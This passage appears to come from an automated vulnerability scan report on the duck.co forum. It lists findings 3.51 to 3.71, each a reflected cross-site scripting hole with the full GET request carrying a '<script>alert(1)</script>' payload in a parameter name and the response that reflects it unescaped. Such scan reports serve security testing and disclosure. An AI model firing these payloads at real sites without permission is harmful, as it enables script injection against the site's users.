Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: zdccn=3eff0436-e0c8-4bca-b5d7-dc80dafe3590; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=3BEEEE0BE7AEE10B833AC8A19B4BA1EC; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Mar 2011 02:01:23 GMT
Server: Apache-Coyote/1.1
Content-Length: 270121


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/?b0edc"><script>alert(1)</script>49b41fe65db=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.51. http://duck.co/duckduckgo-forum [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /duckduckgo-forum

Request

GET /duckduckgo-forum?5c136"><script>alert(1)</script>d22917858db=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=DEA1960F4771D42D380364871BE96CA1; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:53:10 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/duckduckgo-forum?5c136"><script>alert(1)</script>d22917858db=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.52. http://duck.co/topic/2-25-news-stories-to-comment-on [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/2-25-news-stories-to-comment-on

Request

GET /topic/2-25-news-stories-to-comment-on?cc421"><script>alert(1)</script>15f241c5f6a=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=BC90837E51136DF41D2E5C1A36DD2259; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:27 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/2-25-news-stories-to-comment-on?cc421"><script>alert(1)</script>15f241c5f6a=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.53. http://duck.co/topic/2-28-articles-to-comment-on [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/2-28-articles-to-comment-on

Request

GET /topic/2-28-articles-to-comment-on?9ad6f"><script>alert(1)</script>0f0fc7d6575=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=430E01D27D1C973AA7A041E72EDB07C7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:23 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/2-28-articles-to-comment-on?9ad6f"><script>alert(1)</script>0f0fc7d6575=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.54. http://duck.co/topic/about-com-s-web-search-readers-choice-awards [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/about-com-s-web-search-readers-choice-awards

Request

GET /topic/about-com-s-web-search-readers-choice-awards?fddd6"><script>alert(1)</script>782b813e6b4=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=9BD8EB052DDCDE7845B318C64EAF0E3A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:48:03 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/about-com-s-web-search-readers-choice-awards?fddd6"><script>alert(1)</script>782b813e6b4=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.55. http://duck.co/topic/boolean-operators-and-parentheses-for-search-query [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/boolean-operators-and-parentheses-for-search-query

Request

GET /topic/boolean-operators-and-parentheses-for-search-query?5356a"><script>alert(1)</script>3a5218a9e5f=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=9951A7995503FF626EF94A3BB14226DF; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:26 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/boolean-operators-and-parentheses-for-search-query?5356a"><script>alert(1)</script>3a5218a9e5f=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.56. http://duck.co/topic/cached-archived-links [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/cached-archived-links

Request

GET /topic/cached-archived-links?7d974"><script>alert(1)</script>095f9753999=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=D2E90E509CCB6F18DAD71614C65EB2A8; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:27 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/cached-archived-links?7d974"><script>alert(1)</script>095f9753999=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.57. http://duck.co/topic/changing-font-text-and-links [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/changing-font-text-and-links

Request

GET /topic/changing-font-text-and-links?90178"><script>alert(1)</script>8ecdba66b1c=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=1897635EDAA2F0CAADEC92E6DBDECDD1; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:31 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/changing-font-text-and-links?90178"><script>alert(1)</script>8ecdba66b1c=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.58. http://duck.co/topic/ddg-gg [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/ddg-gg

Request

GET /topic/ddg-gg?1f87d"><script>alert(1)</script>dfefae63fd=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=190EE55D6D5AFC25BB18BC1A5E8A2160; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:34 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/ddg-gg?1f87d"><script>alert(1)</script>dfefae63fd=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.59. http://duck.co/topic/ddg-in-alternative-web-browsers [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/ddg-in-alternative-web-browsers

Request

GET /topic/ddg-in-alternative-web-browsers?99aef"><script>alert(1)</script>8dc5c01d57f=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=8643BD559689B8B1B2A35FEE73948DD8; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:50:22 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/ddg-in-alternative-web-browsers?99aef"><script>alert(1)</script>8dc5c01d57f=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.60. http://duck.co/topic/ddg-is-one-of-zoho-s-esteemed-customers [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/ddg-is-one-of-zoho-s-esteemed-customers

Request

GET /topic/ddg-is-one-of-zoho-s-esteemed-customers?ef673"><script>alert(1)</script>97c322092c0=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=5BAAC7BC059097EB4C4595EF7F47428C; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:22 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/ddg-is-one-of-zoho-s-esteemed-customers?ef673"><script>alert(1)</script>97c322092c0=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.61. http://duck.co/topic/ddg-own-search-engine [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/ddg-own-search-engine

Request

GET /topic/ddg-own-search-engine?2b1fc"><script>alert(1)</script>6079817d7c6=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=48EF8EDDFB08BB8180EBFA8EE1ED6E7F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:38 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/ddg-own-search-engine?2b1fc"><script>alert(1)</script>6079817d7c6=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.62. http://duck.co/topic/ddg-userbar-to-spread-the-word [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/ddg-userbar-to-spread-the-word

Request

GET /topic/ddg-userbar-to-spread-the-word?6e0d2"><script>alert(1)</script>c711ea2f578=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=7357B4605B817B31999CF53F381FC93A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:48:07 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/ddg-userbar-to-spread-the-word?6e0d2"><script>alert(1)</script>c711ea2f578=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.63. http://duck.co/topic/default-header-color [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/default-header-color

Request

GET /topic/default-header-color?ed6ea"><script>alert(1)</script>f49f4ebc8e8=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=69C479D219FF1E34996598716D010C9E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:48:57 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/default-header-color?ed6ea"><script>alert(1)</script>f49f4ebc8e8=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.64. http://duck.co/topic/differentiate-duckduckgo-with-other [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/differentiate-duckduckgo-with-other

Request

GET /topic/differentiate-duckduckgo-with-other?33e40"><script>alert(1)</script>80d2d67077=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=C53C477ECA45E47A741E4783F2D88932; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:23 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/differentiate-duckduckgo-with-other?33e40"><script>alert(1)</script>80d2d67077=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.65. http://duck.co/topic/duckduckgo-webs-com-custom-logos [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/duckduckgo-webs-com-custom-logos

Request

GET /topic/duckduckgo-webs-com-custom-logos?71b97"><script>alert(1)</script>24f670c87a4=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=7FEC343447A3EDBEBCF2C15BBFBBF6E6; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:50:38 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/duckduckgo-webs-com-custom-logos?71b97"><script>alert(1)</script>24f670c87a4=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.66. http://duck.co/topic/foss-donation-nominations [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/foss-donation-nominations

Request

GET /topic/foss-donation-nominations?e6560"><script>alert(1)</script>8893641cad6=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=1BF8E9D44C39D4308649726146BA9967; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:49:50 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/foss-donation-nominations?e6560"><script>alert(1)</script>8893641cad6=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.67. http://duck.co/topic/freenet [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/freenet

Request

GET /topic/freenet?feb85"><script>alert(1)</script>5394df960c0=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=BBAD1E4A8BD73492FFDDB2EFEA473824; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:34 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/freenet?feb85"><script>alert(1)</script>5394df960c0=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.68. http://duck.co/topic/historical-traffic-stats [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/historical-traffic-stats

Request

GET /topic/historical-traffic-stats?287ce"><script>alert(1)</script>9e498056177=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=527C52B094A985807596981DE2EFB7AE; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:48:07 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/historical-traffic-stats?287ce"><script>alert(1)</script>9e498056177=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.69. http://duck.co/topic/how-to-get-similar-growth-for-2011 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/how-to-get-similar-growth-for-2011

Request

GET /topic/how-to-get-similar-growth-for-2011?cb1a9"><script>alert(1)</script>bdbfe7579a3=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=B4E92709C63CE04D8FC50F8011402578; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:48:56 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/how-to-get-similar-growth-for-2011?cb1a9"><script>alert(1)</script>bdbfe7579a3=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.70. http://duck.co/topic/i-did-my-own-way-to-promote-ddg [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/i-did-my-own-way-to-promote-ddg

Request

GET /topic/i-did-my-own-way-to-promote-ddg?6a9a1"><script>alert(1)</script>70bd9959dc1=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=5E2E9786BF0F37BF051F6B02225AD55F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:27 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/i-did-my-own-way-to-promote-ddg?6a9a1"><script>alert(1)</script>70bd9959dc1=1&forumGroupUrl=duckduckgo">
...[SNIP]...

3.71. http://duck.co/topic/i-would-love-it-iff-i-need-ideas-fast-please-click [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://duck.co
Path:   /topic/i-would-love-it-iff-i-need-ideas-fast-please-click

Request

GET /topic/i-would-love-it-iff-i-need-ideas-fast-please-click?b3e68"><script>alert(1)</script>87b04d6b67=1 HTTP/1.1
Host: duck.co
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=B7BE3E6E479DC99625054F7C9C515CDD; zdccn=0e3ab477-02f7-44ed-afa7-3623cc729543;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=B8B1D27FE50247008C1F78BE09F3C85D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 01 Mar 2011 02:47:53 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


